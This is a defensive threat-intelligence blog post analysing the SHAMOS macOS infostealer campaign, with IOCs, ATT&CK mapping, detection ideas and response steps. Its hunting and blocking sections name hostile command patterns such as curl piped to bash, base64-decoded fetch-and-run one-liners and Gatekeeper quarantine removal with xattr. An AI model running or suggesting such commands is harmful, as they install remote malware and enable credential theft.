SHAMOS macOS Malware Explained: The Infostealer You Can’t Ignore

Introduction

Between June and August 2025, a criminal crew CrowdStrike tracks as COOKIE SPIDER ran a global malvertising operation that pushed SHAMOS, a variant of Atomic macOS Stealer (AMOS), to Mac users. Ads and fake “Mac help” pages (and a spoofed GitHub repo) told victims to paste a single Terminal command (“ClickFix” style) that silently fetched a Bash installer, bypassed Gatekeeper, dropped a Mach-O payload in /tmp/, and raided browsers, Keychain, Apple Notes, and crypto wallets before exfiltrating a zipped bundle via curl.

CrowdStrike reports 300+ environments were targeted/attempted; the campaign avoided Russia/CIS, consistent with typical e-crime forum rules.

Threat actor & campaign profile

Attribution. SHAMOS is operated within COOKIE SPIDER’s malware-as-a-service (MaaS) business built around AMOS. The crew monetizes by renting the stealer and by converting stolen credentials and crypto.

Distribution & lures. Users searching for fixes like “macOS flush DNS cache” were shown paid search ads for cloned “help” sites (examples observed: mac-safer[.]com, rescue-mac[.]com) or a fake GitHub repo posing as iTerm2. Those pages instructed victims to paste a one-liner into Terminal, the hallmark of a ClickFix attack.

Victimology & scope. CrowdStrike saw attempted delivery in 300+ customer environments across the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy and more; no Russian targets were observed.

Technical analysis

Initial access (ClickFix one-liner)

• Fake help/GitHub pages present a single command. In observed cases it Base64-decodes a URL and pulls a Bash script from attacker infrastructure (e.g., icloudservers[.]com/gm/install.sh).
• This pattern aligns with broader ClickFix social engineering: lure → copy/paste command → user-assisted execution. (Microsoft and others have warned ClickFix surged in 2025.)

Installation

• The script:
• Captures the user’s password (prompted by sudo/similar).
• Downloads the SHAMOS Mach-O to /tmp/, clears quarantine bits via xattr (Gatekeeper bypass), sets chmod +x, and executes.

Defense evasion & runtime behavior

• Anti-VM/sandbox checks before proceeding.
• AppleScript-driven host recon and file collection.
• Collection targets confirmed: browser data (passwords/cookies/auto-fills), Keychain items, Apple Notes, and crypto-wallet artifacts.

Exfiltration

• Data staged into out.zip and sent via curl to actor-controlled endpoints.

Persistence & follow-on payloads

• On systems where the installer gains elevated privileges, it writes a LaunchDaemon com.finder.helper.plist for persistence.
• Observed secondary payloads include a spoofed Ledger Live wallet app and a botnet module.

Infrastructure & IOCs (selected)

• Malvertising/landing domains: mac-safer[.]com, rescue-mac[.]com
• Downloader hosts: icloudservers[.]com, macostutorial[.]com
• GitHub decoy: github[.]com/jeryrymoore/Iterm2
• Local artifacts: /tmp/<random> Mach-O, out.zip, LaunchDaemon com.finder.helper.plist

Extras | Motasem Hamdan / MasterMinds Notes

AboutCyber Security Notes & CoursesContactconsultation@motasem-notes.netProduct's Legal & TOS InfoPlease read…

Who was hit?

Public sources have not named specific organizations. What we do know is:

• The scale (300+ attempted environments) and breadth of geography are confirmed.
• Lures imitated generic Mac troubleshooting and popular software categories (video editing, CAD, “performance tools,” AI/dictation), indicating broad, opportunistic targeting rather than a single vertical. (Inference based on CrowdStrike’s observed decoys.)

Cyber Security Certification Study Notes

The official Cyber Security Certification Study Notes collection for The MasterMind Notes / Motasem Hamdan. Shop…

Political & economic impact

Economic

• Direct losses: crypto theft and account takeovers from stolen Keychain/browser data.
• Indirect losses: Business email/session hijacking, downstream breaches, incident response costs, password resets, and ad-fraud exposure if ad/marketing accounts are compromised. These are consistent with infostealer outcomes and explicitly supported by the data types SHAMOS steals.

Political / policy

Platform trust: Bypassing Gatekeeper via user-paste commands challenges perceptions of macOS security and may spur OS-level guardrails against risky one-liners. (Supported by multiple outlets summarizing the bypass method.)

Ad ecosystem abuse: The campaign leveraged paid search ads and spoofed biz profiles, fueling calls for stronger advertising vetting and anti-malvertising controls.

Technique normalization: ClickFix is now used by both e-crime and some APT actors, blurring crime/state TTPs and complicating attribution at scale.

Start learning cyber security by enrolling in courses provided by top universities and tech giants:

Introduction to Cyber Security

Offered by New York University. Cyber Security. An introduction to modern information and system protection technology…

MITRE ATT&CK mapping (high level)

• Initial Access: T1189 (Drive-by via malvertising), T1204.002 (User Exec: Malicious command)
• Execution: T1059 (Command Shell), T1059.004 (Bash), T1059.002 (AppleScript)
• Defense Evasion: T1562, T1553.001 (Gatekeeper quarantine removal with xattr)
• Credential Access / Collection: T1555.001 (Keychain), T1005 (Local files), T1539 (Browsers)
• Exfiltration: T1041 (Exfil over C2 channel) using curl
• Persistence: T1543.001 (LaunchDaemons)

Detection & hunting ideas (macOS)

Tailor paths and tooling to your EDR/SIEM.

Command-line signals

• Terminal/bash/zsh history containing base64 -d, curl ... | bash, or one-liners fetching install.sh from icloudservers[.]com/macostutorial[.]com.
• xattr -d com.apple.quarantine followed by chmod +x on a file under /tmp/.
• AppleScript/osascript invocations enumerating files/keystores.

Filesystem & artifacts

• Presence of /tmp/<random> Mach-O executed recently.
• ~/Library/LaunchDaemons/com.finder.helper.plist (or similarly named) with recent launchctl loads.
• Recent creation of out.zip under user directories or /tmp/.

Network

• DNS/HTTP(S) to mac-safer[.]com, rescue-mac[.]com, icloudservers[.]com, macostutorial[.]com around the time a user reported “copy/pasting a fix.”

Prevention & hardening (what to do now)

For security teams (enterprise & SMB)

Block risky one-liners by policy

• Add controls in MDM/EDR to alert on/contain Terminal one-liners that fetch from the internet (e.g., curl|bash, bash -c "$(curl …)", base64 -d | bash").

Tighten Gatekeeper/Quarantine flows

• Monitor and alert on xattr -d com.apple.quarantine outside approved installers.

DNS & web filtering

• Enforce safe search/ad filters; block or closely inspect sponsored results; sinkhole known SHAMOS IOCs.

EDR coverage

• Ensure behavior rules catch AppleScript reconnaissance, zip + curl exfil, and LaunchDaemon creation. CrowdStrike and others document detections for this chain.

Least privilege

• Prevent routine access to sudo on user devices; SHAMOS persistence relied on elevated contexts.

Developer tooling controls

• Curate approved GitHub/orgs and Homebrew taps; flag clones/unknown repos, since a fake iTerm2 repo was abused.

User education (just-in-time)

• Teach “never paste commands you don’t understand.” Add in-terminal banners or MDM pop-ups reminding users to route fixes through IT.

For individual Mac users & small teams

• Do not paste Terminal fixes from search results or random GitHub gists.
• Go to official docs (Apple Support/communities) or your IT team for troubleshooting.
• Install from App Store or signed developers you know; keep macOS updated.
• Use a reputable endpoint tool that inspects scripts and blocks known IOCs.

Incident response playbook (SHAMOS-suspected)

Isolate the Mac (network off, especially Wi-Fi).

Acquire volatile data (process list, network connections) and preserve /tmp/, LaunchDaemons, and shell histories.

Hunt & contain

• Remove suspicious LaunchDaemons (e.g., com.finder.helper.plist) and binaries in /tmp/.
• Blocklisted domains/IPs above; search for out.zip creation.

Credential reset & session hygiene

• Rotate Keychain, browser-stored passwords, Apple ID, corporate SSO; invalidate sessions/cookies (force logouts); treat crypto wallets/seeds as compromised.

Forensics to determine persistence and any follow-on payloads (e.g., fake Ledger app, botnet module).

Report malvertising placements to your ad vendor and share telemetry with your ISAC.

Why SHAMOS matters

• It industrializes a reliable social technique (ClickFix) against macOS.
• It shows Gatekeeper bypass by design, not a vuln, when users paste commands.
• It pairs credential/crypto theft with the ability to drop more malware, elevating both immediate financial risk and long-tail business compromise.

References

Most-relevant technical primary source:

• CrowdStrike’s engineering & intel write-up with commands, infra, and geography.

Video Walkthrough

Short Version